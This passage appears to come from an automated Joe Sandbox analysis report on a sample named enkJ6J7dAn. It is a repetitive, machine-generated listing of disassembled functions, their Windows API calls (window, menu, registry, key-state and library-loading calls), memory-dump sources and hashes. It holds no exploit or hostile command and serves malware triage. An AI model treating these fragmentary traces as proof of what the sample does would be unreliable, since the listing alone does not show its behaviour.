                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorMode$AttributesFile_memmove_wcslen
                                                                                                                    • String ID: \VH
                                                                                                                    • API String ID: 3884216118-234962358
                                                                                                                    • Opcode ID: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                                                                                    • Instruction ID: 3f1cdca54a202f1bd1938e87a451cd9606667cca5306a7eaf6ab6c0a6d737147
                                                                                                                    • Opcode Fuzzy Hash: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                                                                                    • Instruction Fuzzy Hash: F9619F715043019BC310EF25C585A5BB7E0BFC8708F04896EFA996B392CB76ED45CB96
APIs
• GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
• IsMenu.USER32(?), ref: 0044854D
• InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
• DrawMenuBar.USER32 ref: 004485AF
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: Menu$Item$DrawInfoInsert
• String ID: 0
• API String ID: 3076010158-4108050209
APIs
  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
• SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
• SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
• SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC
  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
Similarity
• API ID: MessageSend$_memmove_wcslen
• String ID: ComboBox$ListBox
• API String ID: 1589278365-1403004172
Similarity
• API ID: Handle
• String ID: nul
• API String ID: 2519475695-2873401336
APIs
• GetStdHandle.KERNEL32(000000F6), ref: 0044337D
Similarity
• API ID: Handle
• String ID: nul
• API String ID: 2519475695-2873401336
Similarity
• String ID: SysAnimate32
• API String ID: 0-1011021900
APIs
  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
  • Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
  • Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
  • Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32 ref: 004364A3
  • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
• GetFocus.USER32 ref: 0046157B
  • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
  • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF
• GetClassNameW.USER32(?,?,00000100), ref: 004615C4
• EnumChildWindows.USER32(?,Function_00045B98,?), ref: 004615EF
• __swprintf.LIBCMT ref: 00461608
Similarity
• API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
• String ID: %s%d
• API String ID: 2645982514-1110647743
APIs
• GetCurrentProcessId.KERNEL32(?), ref: 0047584D
• OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
• GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
• CloseHandle.KERNEL32(00000000), ref: 00475A4D
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3488606520-0
                                                                                                                    • Opcode ID: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                                                                                                                    • Instruction ID: 747e8e91012d04cc7bcfbda4f2b49d0ca9967bea8b965680eccea6cdbc9dea0c
                                                                                                                    • Opcode Fuzzy Hash: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                                                                                                                    • Instruction Fuzzy Hash: 82817170A047029FD310DF65C981B4BBBE1BF84704F10892EF6999B3D2DA75E944CB96
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ConnectRegistry_memmove_wcslen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 15295421-0
                                                                                                                    • Opcode ID: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                                                                                    • Instruction ID: 481e56be03c4cee60d8ca92471cfa4b3875eab78bcfcbf7fb961631f720e0f99
                                                                                                                    • Opcode Fuzzy Hash: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                                                                                    • Instruction Fuzzy Hash: 7D515F71208301ABD304EF65C885E5BB7A8FF88704F10892EB54597291D774E945CBA6
                                                                                                                    APIs
                                                                                                                    • LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
                                                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 004648F7
                                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 00464916
                                                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 0046495A
                                                                                                                    • FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$Library$FreeLoad
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2449869053-0
                                                                                                                    • Opcode ID: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                                                                                                    • Instruction ID: 8919579e2c9fc9b2d94c4928dd3202a5bdd7863bc063e44bf2a6fba2f1eed130
                                                                                                                    • Opcode Fuzzy Hash: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                                                                                                    • Instruction Fuzzy Hash: 2351BF756002049FCB00EFA4C985A9EB7B4EF88304F14856EFD05AB392DB79ED45CB99
                                                                                                                    APIs
                                                                                                                    • GetCursorPos.USER32(?), ref: 004563A6
                                                                                                                    • ScreenToClient.USER32(?,?), ref: 004563C3
                                                                                                                    • GetAsyncKeyState.USER32(?), ref: 00456400
                                                                                                                    • GetAsyncKeyState.USER32(?), ref: 00456410
                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00456466
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AsyncState$ClientCursorLongScreenWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3539004672-0
                                                                                                                    • Opcode ID: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                                                                                    • Instruction ID: 60090bce41a6de58f2ab96a8453d1e3558661e38fd0c916b19f374a884add038
                                                                                                                    • Opcode Fuzzy Hash: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                                                                                    • Instruction Fuzzy Hash: 49414C74504204BBDB24CF65C884EEFBBB8EB46326F60464EFC6593281CB34A944CB68
                                                                                                                    APIs
                                                                                                                    • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
                                                                                                                    • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
                                                                                                                    • Sleep.KERNEL32(0000000A), ref: 0047D455
                                                                                                                    • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
                                                                                                                    • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Interlocked$DecrementIncrement$Sleep
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 327565842-0
                                                                                                                    • Opcode ID: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                                                                                    • Instruction ID: e00c67d4cb89bf1d5311357fb713975cbca1e0cfcee7190b0451066ade77f289
                                                                                                                    • Opcode Fuzzy Hash: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                                                                                    • Instruction Fuzzy Hash: CC412571A002055FEB10DF65CD84AEE7774EF45304B10852EF609A7351E738EE46CB99
                                                                                                                    APIs
                                                                                                                    • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C44F
                                                                                                                    • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C477
                                                                                                                    • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C4C3
                                                                                                                    • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C4E7
                                                                                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C4F6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: PrivateProfile$SectionWrite$String
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2832842796-0
                                                                                                                    • Opcode ID: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                                                                                                                    • Instruction ID: 1eb5009190fa999c36a74edd43b7bd9b51adbc8f8691a9c3f5840d50e9073e8b
                                                                                                                    • Opcode Fuzzy Hash: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                                                                                                                    • Instruction Fuzzy Hash: D1413075A00209BFDB10EFA1DC85FAAB7A8BF44305F10855EF9049B292DA79EE44CB54
                                                                                                                    APIs
                                                                                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00441CFE
                                                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
                                                                                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Enum$CloseDeleteOpen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2095303065-0
                                                                                                                    • Opcode ID: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                                                                                    • Instruction ID: 7ca4c7ada97503ad9332fce322fe5d5fc03c2789ff93db080e75f28165cdf273
                                                                                                                    • Opcode Fuzzy Hash: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                                                                                    • Instruction Fuzzy Hash: 69317CB2940108BAEB10DBD4DC85FFEB77CEB49304F04456EF605A7241D774AA858BA8
                                                                                                                    APIs
                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00436A24
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: RectWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 861336768-0
                                                                                                                    • Opcode ID: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                                                                                    • Instruction ID: 0a42da3bb0701689e96ef39581243ed39d97d4ba46bd7cd8c1f057aae640e0d3
                                                                                                                    • Opcode Fuzzy Hash: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                                                                                    • Instruction Fuzzy Hash: E531EA7160021EAFDB00DF68D988AAE77A5EB49324F11C62AFD24E7380D774EC11CB90
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32 ref: 00449598
                                                                                                                      • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                                                                                    • SendMessageW.USER32(?,00001074,?,?), ref: 004495F8
                                                                                                                    • _wcslen.LIBCMT ref: 0044960D
                                                                                                                    • _wcslen.LIBCMT ref: 0044961A
                                                                                                                    • SendMessageW.USER32(?,00001074,?,?), ref: 0044964E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$_wcslen$_wcspbrk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1856069659-0
                                                                                                                    • Opcode ID: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                                                                                    • Instruction ID: 683be220b4a5e9d86ccbf412c3bd2f13dbb60120779f28b1c577ab6eeef24407
                                                                                                                    • Opcode Fuzzy Hash: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                                                                                    • Instruction Fuzzy Hash: 77318F71A00218ABEB20DF59DC80BDFB374FF94314F10466AFA0497280E7B59D958B94
                                                                                                                    APIs
                                                                                                                    • GetCursorPos.USER32(?), ref: 004478E2
                                                                                                                    • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
                                                                                                                    • DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
                                                                                                                    • GetCursorPos.USER32(00000000), ref: 0044796A
                                                                                                                    • TrackPopupMenuEx.USER32(030763C0,00000000,00000000,?,?,00000000), ref: 00447991
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CursorMenuPopupTrack$Proc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1300944170-0
                                                                                                                    • Opcode ID: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                                                                                    • Instruction ID: 8079d3ea29232e2d8a780d7c6517a0c600664366e77620ab1eef72d1e193e80f
                                                                                                                    • Opcode Fuzzy Hash: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                                                                                    • Instruction Fuzzy Hash: EF31CF75600108AFE724CF59DC88FABB768EB89310F20455AF94587391C775AC53CBA8
                                                                                                                    APIs
                                                                                                                    • GetClientRect.USER32(?,?), ref: 004479CC
                                                                                                                    • GetCursorPos.USER32(?), ref: 004479D7
                                                                                                                    • ScreenToClient.USER32(?,?), ref: 004479F3
                                                                                                                    • WindowFromPoint.USER32(?,?), ref: 00447A34
                                                                                                                    • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447AAD
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Client$CursorFromPointProcRectScreenWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1822080540-0
                                                                                                                    • Opcode ID: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                                                                                    • Instruction ID: a7e7621e8492875af53c289f1ad187460d50aec5ad556b3834d9a5cb4abdf121
                                                                                                                    • Opcode Fuzzy Hash: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                                                                                    • Instruction Fuzzy Hash: B831A2741082029FE710DF69D884D7FB7A4FB89314F144A1EF850D7291D774E946CBA6
                                                                                                                    APIs
                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                                                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                                                                                    • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                                                                                    • EndPaint.USER32(?,?), ref: 00447D13
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClientPaintRectRectangleScreenViewportWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 659298297-0
                                                                                                                    • Opcode ID: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                                                                                    • Instruction ID: 3c0582d8bc81ba5dadaaf244cb1f1d3939805113443e317e1f98b5bdeebaec33
                                                                                                                    • Opcode Fuzzy Hash: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                                                                                    • Instruction Fuzzy Hash: C33161706043019FE310CF25D8C8F7B7BE8EB86724F144A6EF9A5872A1C774A845DB69
                                                                                                                    APIs
                                                                                                                    • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                                                                    • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                                                    • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                                                    • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                                                      • Part of subcall function 00440D98: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
                                                                                                                      • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
                                                                                                                      • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
